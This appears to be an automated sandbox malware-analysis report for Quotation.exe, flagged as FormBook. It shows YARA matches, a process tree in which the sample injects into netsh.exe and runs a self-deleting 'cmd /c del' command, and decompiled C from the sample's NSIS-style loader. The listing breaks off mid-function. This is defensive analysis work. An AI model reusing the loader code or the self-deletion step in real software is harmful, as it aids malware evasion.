                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE2
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE2
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE2
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE2

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: Quotation.exe PID: 6372 Parent PID: 5748

                                              General

                                              Start time:13:35:44
                                              Start date:08/04/2021
                                              Path:C:\Users\user\Desktop\Quotation.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Quotation.exe'
                                              Imagebase:0x400000
                                              File size:228099 bytes
                                              MD5 hash:1F86CAAA19912CEB55C9F6121EB692BB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: Quotation.exe PID: 6424 Parent PID: 6372

                                              General

                                              Start time:13:35:45
                                              Start date:08/04/2021
                                              Path:C:\Users\user\Desktop\Quotation.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Quotation.exe'
                                              Imagebase:0x400000
                                              File size:228099 bytes
                                              MD5 hash:1F86CAAA19912CEB55C9F6121EB692BB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: explorer.exe PID: 3472 Parent PID: 6424

                                              General

                                              Start time:13:35:49
                                              Start date:08/04/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff693d90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: netsh.exe PID: 6916 Parent PID: 3472

                                              General

                                              Start time:13:36:03
                                              Start date:08/04/2021
                                              Path:C:\Windows\SysWOW64\netsh.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\netsh.exe
                                              Imagebase:0x7ff797770000
                                              File size:82944 bytes
                                              MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: cmd.exe PID: 7012 Parent PID: 6916

                                              General

                                              Start time:13:36:08
                                              Start date:08/04/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Quotation.exe'
                                              Imagebase:0xc40000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 7072 Parent PID: 7012

                                              General

                                              Start time:13:36:08
                                              Start date:08/04/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7ecfc0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: Quotation.exe PID: 6372 Parent PID: 5748 Quotation.exeCOMMON

                                                Executed Functions

                                                Function 00403166, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282stringfilecomCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x42f4d0 = _t31;
				SHGetFileInfoA(0x429860, 0,  &_v356, 0x160, 0); // executed
				E004059DB("ACID Setup", "NSIS Error");
				_t89 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89);
				_t36 = E00403132(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "\"C:\\Users\\alfons\\Desktop\\Quotation.exe\" ";
					DeleteFileA(_t96); // executed
					E004059DB(_t96, GetCommandLineA());
					 *0x42f420 = GetModuleHandleA(0);
					_t41 = _t96;
					if("\"C:\\Users\\alfons\\Desktop\\Quotation.exe\" " == 0x22) {
						_v404 = 0x22;
						_t41 =  &M00435001;
					}
					_t43 = CharNextA(E00405513(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E00405513(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059DB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E0040351D();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x42f4b4;
											if( *0x42f4b4 != 0) {
												_t106 = E00405CEE("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CEE("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CEE("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x42f4cc;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052DB(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x42f434 == _t46) {
										L31:
										 *0x42f4cc =  *0x42f4cc | 0xffffffff;
										_v396 = E00403542();
										goto L32;
									}
									_t103 = E00405513(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x428c60 = 0x22;
											lstrcatA(0x428c60, _t89);
											lstrcatA(0x428c60, "Au_.exe");
											DeleteFileA(0x428c61);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x42f420, 0x429460, 0x400) + 0x42945a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x429460, 0x428c61, 0) != 0) {
												E00405723(0x428c61, 0);
												if("C:\\Users\\alfons\\AppData\\Local\\Temp" == 0) {
													E0040552F(0x429460);
												} else {
													E004059DB(0x429460, "C:\\Users\\alfons\\AppData\\Local\\Temp");
												}
												lstrcatA(0x428c60, "\" ");
												lstrcatA(0x428c60, _v400);
												lstrcatA(0x428c60, " _?=");
												lstrcatA(0x428c60, 0x429460);
												E004054E8(0x428c60);
												_t78 = E00405263(0x428c60, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055C8(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059DB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									E004059DB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403132(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}































                                                0x0040316f
                                                0x00403172
                                                0x00403176
                                                0x0040317b
                                                0x00403180
                                                0x00403187
                                                0x0040318d
                                                0x004031a3
                                                0x004031b3
                                                0x004031b8
                                                0x004031c3
                                                0x004031c9
                                                0x004031ce
                                                0x004031d0
                                                0x004031f6
                                                0x004031f6
                                                0x004031fc
                                                0x0040320a
                                                0x0040321e
                                                0x00403223
                                                0x00403225
                                                0x00403227
                                                0x0040322c
                                                0x0040322c
                                                0x0040323c
                                                0x00403242
                                                0x004032ab
                                                0x004032ab
                                                0x004032ad
                                                0x004032af
                                                0x00000000
                                                0x00000000
                                                0x00403248
                                                0x0040324b
                                                0x00403253
                                                0x00403253
                                                0x00403256
                                                0x0040325b
                                                0x0040325d
                                                0x0040325d
                                                0x0040325e
                                                0x0040325e
                                                0x00403263
                                                0x00403266
                                                0x0040329b
                                                0x004032a0
                                                0x004032a5
                                                0x004032a8
                                                0x004032aa
                                                0x004032aa
                                                0x004032aa
                                                0x00000000
                                                0x00403268
                                                0x00403268
                                                0x00403269
                                                0x0040326c
                                                0x00403274
                                                0x00403277
                                                0x00403279
                                                0x00403279
                                                0x00403279
                                                0x00403277
                                                0x0040327c
                                                0x00403282
                                                0x0040328a
                                                0x0040328d
                                                0x0040328f
                                                0x0040328f
                                                0x0040328f
                                                0x0040328d
                                                0x00403292
                                                0x00403299
                                                0x004032b3
                                                0x004032b7
                                                0x004032c0
                                                0x004032c5
                                                0x004032c6
                                                0x004032cb
                                                0x004032cf
                                                0x00403332
                                                0x00403332
                                                0x00403337
                                                0x0040333f
                                                0x0040346a
                                                0x00403471
                                                0x0040348d
                                                0x0040349a
                                                0x004034a3
                                                0x004034a5
                                                0x004034a7
                                                0x004034a9
                                                0x004034ab
                                                0x004034ad
                                                0x004034af
                                                0x004034bf
                                                0x004034c1
                                                0x004034c3
                                                0x004034d0
                                                0x004034df
                                                0x004034e7
                                                0x004034ef
                                                0x004034ef
                                                0x004034c3
                                                0x004034af
                                                0x004034ab
                                                0x004034f4
                                                0x004034fa
                                                0x004034fc
                                                0x00403500
                                                0x00403500
                                                0x004034fc
                                                0x00403505
                                                0x0040350a
                                                0x0040350d
                                                0x0040350f
                                                0x0040350f
                                                0x00403517
                                                0x00403517
                                                0x0040334b
                                                0x00403352
                                                0x00403352
                                                0x004032d7
                                                0x00403322
                                                0x00403322
                                                0x0040332e
                                                0x00000000
                                                0x0040332e
                                                0x004032e0
                                                0x004032ed
                                                0x004032e4
                                                0x004032ea
                                                0x00000000
                                                0x00000000
                                                0x004032ec
                                                0x004032ec
                                                0x004032ec
                                                0x004032f1
                                                0x004032f3
                                                0x004032f8
                                                0x0040335e
                                                0x00403366
                                                0x0040336c
                                                0x0040337b
                                                0x0040337d
                                                0x00403386
                                                0x00403391
                                                0x0040339b
                                                0x004033a3
                                                0x00000000
                                                0x00000000
                                                0x004033cf
                                                0x00000000
                                                0x00000000
                                                0x004033e5
                                                0x004033ee
                                                0x004033fa
                                                0x0040340a
                                                0x004033fc
                                                0x00403402
                                                0x00403402
                                                0x00403415
                                                0x0040341f
                                                0x0040342a
                                                0x00403431
                                                0x00403437
                                                0x0040343e
                                                0x00403445
                                                0x00403448
                                                0x0040344e
                                                0x0040344e
                                                0x00403445
                                                0x00403450
                                                0x00403450
                                                0x00403456
                                                0x0040345a
                                                0x00000000
                                                0x00403465
                                                0x004032fa
                                                0x004032fd
                                                0x00403308
                                                0x00000000
                                                0x00000000
                                                0x00403310
                                                0x0040331b
                                                0x00403320
                                                0x00000000
                                                0x00403320
                                                0x00000000
                                                0x00403299
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040324d
                                                0x0040324d
                                                0x0040324d
                                                0x0040324e
                                                0x0040324e
                                                0x00000000
                                                0x0040324d
                                                0x00000000
                                                0x004032b1
                                                0x004031d8
                                                0x004031e4
                                                0x004031f0
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • #17.COMCTL32 ref: 00403180
                                                • OleInitialize.OLE32(00000000), ref: 00403187
                                                • SHGetFileInfoA.SHELL32(00429860,00000000,?,00000160,00000000), ref: 004031A3
                                                  • Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,ACID Setup,NSIS Error), ref: 004059E8
                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,ACID Setup,NSIS Error), ref: 004031C3
                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031D8
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031E4
                                                  • Part of subcall function 00403132: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00403153
                                                • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\Quotation.exe" ), ref: 004031FC
                                                • GetCommandLineA.KERNEL32 ref: 00403202
                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Quotation.exe" ,00000000), ref: 00403211
                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Quotation.exe" ,00000020), ref: 0040323C
                                                • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 00403337
                                                • ExitProcess.KERNEL32 ref: 00403352
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\Quotation.exe" ,00000000,00000000,00000000,00000020), ref: 0040335E
                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\Quotation.exe" ,00000000,00000000,00000000,00000020), ref: 00403366
                                                • lstrcatA.KERNEL32(00428C60,C:\Users\user\AppData\Local\Temp\), ref: 00403386
                                                • lstrcatA.KERNEL32(00428C60,Au_.exe,00428C60,C:\Users\user\AppData\Local\Temp\), ref: 00403391
                                                • DeleteFileA.KERNEL32(00428C61,00428C60,Au_.exe,00428C60,C:\Users\user\AppData\Local\Temp\), ref: 0040339B
                                                • GetModuleFileNameA.KERNEL32(00429460,00000400), ref: 004033B5
                                                • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033C7
                                                • CopyFileA.KERNEL32(00429460,00428C61,00000000), ref: 004033DD
                                                • lstrcatA.KERNEL32(00428C60,00409218,00429460,00428C61,00000000), ref: 00403415
                                                • lstrcatA.KERNEL32(00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 0040341F
                                                • lstrcatA.KERNEL32(00428C60, _?=,00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 0040342A
                                                • lstrcatA.KERNEL32(00428C60,00429460,00428C60, _?=,00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 00403431
                                                • CloseHandle.KERNEL32(00000000,00428C60,C:\Users\user\AppData\Local\Temp\,00428C60,00428C60,00429460,00428C60, _?=,00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 00403448
                                                • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 004034B8
                                                • ExitWindowsEx.USER32 ref: 004034F4
                                                • ExitProcess.KERNEL32 ref: 00403517
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\Quotation.exe" $ACID Setup$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                                • API String ID: 3079827372-1815790536
                                                • Opcode ID: 8c8cb09e11507eea63e2f083beeee93ee118921aa890babe305c7a6650db8a6b
                                                • Instruction ID: b2928dc65eb712516e19e911de1db687ceab521ce29b32085d2a85fb78ed52a1
                                                • Opcode Fuzzy Hash: 8c8cb09e11507eea63e2f083beeee93ee118921aa890babe305c7a6650db8a6b
                                                • Instruction Fuzzy Hash: 1791E370A48750BAD7216F619C0AB2B3E9CEF4570AF54097FF441B61D3CBBC99018A6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040531D, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156filestringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E0040531D(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055C8(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x42f4a8 =  *0x42f4a8 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059DB(0x42b8a8, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E0040552F(_t74);
					} else {
						lstrcatA(0x42b8a8, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x42b8a8,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E00405513( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059DB(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D7E(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x42f4a8 =  *0x42f4a8 + 1;
									} else {
										E00404D7E(0xfffffff1, _t74);
										E00405723(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E0040531D(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405CB0(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054E8(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D7E(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D7E(0xfffffff1, _t74);
							return E00405723(_t74, 0);
						}
						L30:
						 *0x42f4a8 =  *0x42f4a8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                0x00405328
                                                0x0040532c
                                                0x00405335
                                                0x00405338
                                                0x0040533b
                                                0x00405343
                                                0x00405345
                                                0x00405346
                                                0x00000000
                                                0x00405346
                                                0x00405355
                                                0x00405355
                                                0x00405358
                                                0x0040535b
                                                0x0040536f
                                                0x00405376
                                                0x0040537b
                                                0x0040537d
                                                0x0040538d
                                                0x0040537f
                                                0x00405385
                                                0x00405385
                                                0x00405398
                                                0x004053ad
                                                0x004053af
                                                0x004053b5
                                                0x004053b8
                                                0x004053bb
                                                0x0040547d
                                                0x0040547d
                                                0x00405481
                                                0x00405483
                                                0x00405483
                                                0x00405483
                                                0x00405483
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004053c1
                                                0x004053c1
                                                0x004053ca
                                                0x004053d0
                                                0x004053d5
                                                0x004053d8
                                                0x004053da
                                                0x004053de
                                                0x004053e0
                                                0x004053e0
                                                0x004053de
                                                0x004053e3
                                                0x004053e6
                                                0x004053f9
                                                0x004053fb
                                                0x00405400
                                                0x00405406
                                                0x00405408
                                                0x00405423
                                                0x0040542a
                                                0x00405430
                                                0x00405432
                                                0x00405457
                                                0x00405434
                                                0x00405434
